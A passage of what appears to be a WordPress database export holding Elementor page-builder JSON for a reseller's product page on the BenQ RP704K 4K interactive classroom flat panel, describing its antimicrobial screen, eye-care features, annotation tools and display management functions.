use.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"170aa2a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8471643\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f2141cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>* TUV Test Confirmed<\\/strong><br \\/>TUV is the world\\u2019s leading inspection and verification company, providing internationally approved testing services to verify product quality and performance. Placing our trust TUV\\u2019s best-in-class facilities and world-recognized integrity, we had their experts rigidly evaluate the screen\\u2019s antimicrobial efficacy. Proved by the JIS Z 2801:2010 testing methods, the result shows that BenQ\\u2019s AG+ Screen can effectively restrain the microbial growth of Escherichia coli, Staphylococcus aureus and Pseudomonas aeruginosa. To maintain antimicrobial efficacy, please frequently wipe your touch screen with a clean, soft, lint-free cloth moisturized with a neutral detergent.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"88d63dc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9a92e2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f23907c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Smart Eye-Care Solution<\\/strong><\\/p><p>The Smart Eye-Care solution can function intuitively with the help of the embedded motion sensor. For a smooth and comfortable viewing experience, RP704K will automatically activate Flicker-Free and Low Blue Light features by detecting the movement of users close to the screen.<br \\/>*For Android devices, BenQ\\u2019s RP704K will automatically set screen backlight to a comfortable setting instead of switching to the Low Blue Light mode.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f69235\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fa63930\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8a45b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>T\\u00dcV-Certified Low Blue Light Technology<\\/strong><\\/p><p><span style=\\\"font-size: 0.875rem;\\\">Blue light emissions from displays may cause adverse health effects such as macular degeneration or disrupted melatonin secretion. BenQ\\u2019s Low Blue Light technology minimizes blue light exposure and allows for healthier time spent in front of the display, helping you create the best and most comfortable viewing experience for you and your students.<\\/span><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cdbbd38\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9410e4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/low-bluelight.png\",\"id\":2819}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"678cc05\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"819463a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"28220a3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-interactive-flat-panel-eye-care-solution-1-before.png\",\"id\":2820}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ce9aeba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"91666dd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anti-Glare Display<\\/strong><\\/p><p>Screen glare can cause reflected images on the screen, making it challenging for students to see, take notes, and remain focused. The RP704K\\u2019s anti-glare glass surface can effectively reduce reflections, freeing students from excessive squinting with more legible text and clearer images, avoiding eye strain and facilitating more effective instruction.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b52bca\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cdf6ddc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"323737a\",\"elType\":\"widget\",\"settings\":{\"title\":\"EZWrite 4.1 : An Easy and Fun Annotation Solution\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d45294e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2b36de6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e1ec4b7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Intelligent Handwriting Recognition<\\/strong><\\/p><p>The Smartboard RP704K\\u2019s handwriting recognition feature allows presenters to simultaneously convert written text, numbers, forms, and drawings into legible materials without having to switch modes while effectively facilitating smooth teaching flow.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8dd3132\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"36697a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-22.jpg\",\"id\":2822}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fa56a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0939589\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0acc085\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-01.jpg\",\"id\":2823}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"54da0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6ed8ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wireless Solution for Seamless Collaboration<\\/strong><\\/p><p>InstaQShare is the software designed for seamless wireless presentation and collaboration during lectures. It allows the smooth streaming of visual, audio files and Full HD quality videos. Users can also mirror content from mobile devices, and invite up to 16 participants for seamless collaboration.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"07ba6b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"80e0f78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3a6161d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>20-Point Multi-Touch Interactivity<\\/strong><\\/p><p>As the leading pioneer on the market, the RP Series supports multi-touch capability up to 20 points, allowing more students to participate in a discussion and highly engaging activities at once.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"200de74\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d25d95e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-02.jpg\",\"id\":2824}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"900ab72\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3d86fe0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"744c11b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Facilitate Teaching Flow with Friendly Design\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9fa4c57\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9912ac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ee788c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-08.png\",\"id\":2825}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ba4df64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Integrated Front-Facing Speaker and Pen Tray<\\/strong><\\/p><p>RP704K integrates the repositioned audio speakers with the screen-length pen tray. The two front-facing,16W speakers create better sound transmission and bring more audiovisual enjoyment to interactive learning. The pen tray offers a handy place to keep IFP stylus and other tools that help enrich and smoothen presentations, providing fast access and avoiding needless interruption.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"776468e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e3a48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-09.png\",\"id\":2826}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e34662e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Account Management System for Personalized File Management<\\/strong><\\/p><p>BenQ\'s IFPs support multi-account management through NFC technology, which allows users to directly access their personal system-setting and folders by simply scanning ID cards with the built-in sensor, as well as easily lock screens when not in use. AMS also offers instant access to major cloud storage services without having to enter password.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"91f7a3f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5caf9fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2d41625\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>NFC Pen<\\/strong><\\/p><p>With a simple tap of the NFCPen at the sensor, you can instantly activate the EZWrite 4.1 annotation app, and begin to annotate with different colors. Built with NFC technology, the NFCPen is battery-free and doesn\'t require device pairing. It is also waterproof while being able to withstand long-term use.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2fd161\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0fb3584\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-10.png\",\"id\":2827}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"57d3c62\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"751b521\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e35cd2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-04.jpg\",\"id\":2828}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"374a056\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec7b171\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Front Buttons<\\/strong> <br \\/>The front buttons, including Power, Home, Back, Setting, and Volume, further enhance the convenience of using IFPs and help teachers easily control the pace of lectures.<\\/p><p><strong>Instant Plug and Play<\\/strong> <br \\/>RP704K can save you from the hassles of complicated setup. Simply connect to a PC via USB and you\\u2019re all set to deliver compelling IFP touch-enhanced lessons.<\\/p><p><strong>Parental Control<\\/strong> <br \\/>BenQ IFPs come with website control feature that blocks certain websites by configuring proxy server settings, which is useful for preventing students from accessing inappropriate content.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c06c26c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cdee68c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c5aa819\",\"elType\":\"widget\",\"settings\":{\"title\":\"Display Management Support\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5fcf286\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0fcf021\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"137f9bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Multiple Display Administrator (MDA)<\\/strong><\\/p><p>Multiple Display Administrator (MDA) allows school IT to remotely control the general display settings of IFPs and schedule their on\\/off times, which helps to create hassle-free maintenance.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"61de455\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5d041e0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-05.jpg\",\"id\":2829}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"85858fd\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"630131a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c81a461\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-06.jpg\",\"id\":2830}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d09571\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7562601\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>EasySetting<\\/strong><\\/p><p>Install Android\\u2122 apps for a selection of displays through the BenQ cloud server. EasySetting can save you from repetitive manual installation.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65cdaaa\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2b1c982\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ce849b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Over-the-Air Update (OTA)<\\/strong><\\/p><p>Upgrade your displays with the latest BenQ firmware via BenQ\\u2019s OTA update support to keep them running smoothly at all times.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5ce7f62\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3400375\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-07.jpg\",\"id\":2831}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fa35854\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"83a22ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4c554c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(4912,1447,'_elementor_data','[{\"id\":\"926e9aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"dc7a582\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df626b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"BenQ Corporate Interactive Smartboard Touchscreen Display | RP704K 4K UHD 70\\u2019\\u2019\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"86ad24f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"bd94d77\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7f09a6c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>4K UHD 70\\u2019\\u2019 Education Interactive Flat Panel Display | RP704K<\\/h4><p><strong>Your Caring Mate for Enhanced Interactive Learning<\\/strong><\\/p><p><br \\/>The RP704K is designed to tap into the dynamic possibilities of the classroom and help teachers build a healthy and engaging learning environment. Not only does it come with Germ-Resistant Screen, but the Smartboard RP704K also comes installed with proficient annotation tools for enhanced class participation. It is your ultimate interactive display to achieve a touch-enhanced, smooth and fun learning experience.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"45957e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"776c1c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/Board-Management-1.png\",\"id\":2817}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"022d2bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1dc7d9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2005776\",\"elType\":\"widget\",\"settings\":{\"title\":\"Create a Healthy Learning Environment for Students\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c85d973\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0e86a71\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"879bd0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/edu-rp750k-21-1.png\",\"id\":2818}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e6f5604\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cf641a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Germ-Resistant Screen<\\/strong><br \\/>The Germ-Resistant Screen is empowered by a multilayer coating of the non-toxic, enduring nano ionic silver agent that kills most germs accumulating on screen surfaces and prevent cross-infection or epidemic in classrooms. The ionic silver\\u2019s antimicrobial feature remains effective even after thorough cleaning or long periods of use.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"170aa2a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8471643\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f2141cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>* TUV Test Confirmed<\\/strong><br \\/>TUV is the world\\u2019s leading inspection and verification company, providing internationally approved testing services to verify product quality and performance. Placing our trust TUV\\u2019s best-in-class facilities and world-recognized integrity, we had their experts rigidly evaluate the screen\\u2019s antimicrobial efficacy. Proved by the JIS Z 2801:2010 testing methods, the result shows that BenQ\\u2019s AG+ Screen can effectively restrain the microbial growth of Escherichia coli, Staphylococcus aureus and Pseudomonas aeruginosa. To maintain antimicrobial efficacy, please frequently wipe your touch screen with a clean, soft, lint-free cloth moisturized with a neutral detergent.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"88d63dc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9a92e2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f23907c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Smart Eye-Care Solution<\\/strong><\\/p><p>The Smart Eye-Care solution can function intuitively with the help of the embedded motion sensor. For a smooth and comfortable viewing experience, RP704K will automatically activate Flicker-Free and Low Blue Light features by detecting the movement of users close to the screen.<br \\/>*For Android devices, BenQ\\u2019s RP704K will automatically set screen backlight to a comfortable setting instead of switching to the Low Blue Light mode.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f69235\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fa63930\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8a45b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>T\\u00dcV-Certified Low Blue Light Technology<\\/strong><\\/p><p><span style=\\\"font-size: 0.875rem;\\\">Blue light emissions from displays may cause adverse health effects such as macular degeneration or disrupted melatonin secretion. BenQ\\u2019s Low Blue Light technology minimizes blue light exposure and allows for healthier time spent in front of the display, helping you create the best and most comfortable viewing experience for you and your students.<\\/span><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cdbbd38\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9410e4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/low-bluelight.png\",\"id\":2819}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"678cc05\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"819463a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"28220a3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-interactive-flat-panel-eye-care-solution-1-before.png\",\"id\":2820}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ce9aeba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"91666dd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anti-Glare Display<\\/strong><\\/p><p>Screen glare can cause reflected images on the screen, making it challenging for students to see, take notes, and remain focused. The RP704K\\u2019s anti-glare glass surface can effectively reduce reflections, freeing students from excessive squinting with more legible text and clearer images, avoiding eye strain and facilitating more effective instruction.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b52bca\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cdf6ddc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"323737a\",\"elType\":\"widget\",\"settings\":{\"title\":\"EZWrite 4.1 : An Easy and Fun Annotation Solution\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d45294e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2b36de6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e1ec4b7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Intelligent Handwriting Recognition<\\/strong><\\/p><p>The Smartboard RP704K\\u2019s handwriting recognition feature allows presenters to simultaneously convert written text, numbers, forms, and drawings into legible materials without having to switch modes while effectively facilitating smooth teaching flow.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8dd3132\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"36697a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-22.jpg\",\"id\":2822}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fa56a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0939589\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0acc085\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-01.jpg\",\"id\":2823}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"54da0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6ed8ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wireless Solution for Seamless Collaboration<\\/strong><\\/p><p>InstaQShare is the software designed for seamless wireless presentation and collaboration during lectures. It allows the smooth streaming of visual, audio files and Full HD quality videos. Users can also mirror content from mobile devices, and invite up to 16 participants for seamless collaboration.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"07ba6b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"80e0f78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3a6161d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>20-Point Multi-Touch Interactivity<\\/strong><\\/p><p>As the leading pioneer on the market, the RP Series supports multi-touch capability up to 20 points, allowing more students to participate in a discussion and highly engaging activities at once.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"200de74\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d25d95e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-02.jpg\",\"id\":2824}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"900ab72\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3d86fe0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"744c11b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Facilitate Teaching Flow with Friendly Design\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9fa4c57\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9912ac0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ee788c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-08.png\",\"id\":2825}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ba4df64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Integrated Front-Facing Speaker and Pen Tray<\\/strong><\\/p><p>RP704K integrates the repositioned audio speakers with the screen-length pen tray. The two front-facing,16W speakers create better sound transmission and bring more audiovisual enjoyment to interactive learning. The pen tray offers a handy place to keep IFP stylus and other tools that help enrich and smoothen presentations, providing fast access and avoiding needless interruption.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"776468e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e3a48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/rp750k-09.png\",\"id\":2826}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e34662e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Account Management System for Personalized File Management<\\/strong><\\/p><p>BenQ\'s IFPs support multi-account management through NFC technology, which allows users to directly access their personal system-setting and folders by simply scanning ID cards with the built-in sensor, as well as easily lock screens when not in use. AMS also offers instant access to major cloud storage services without having to enter 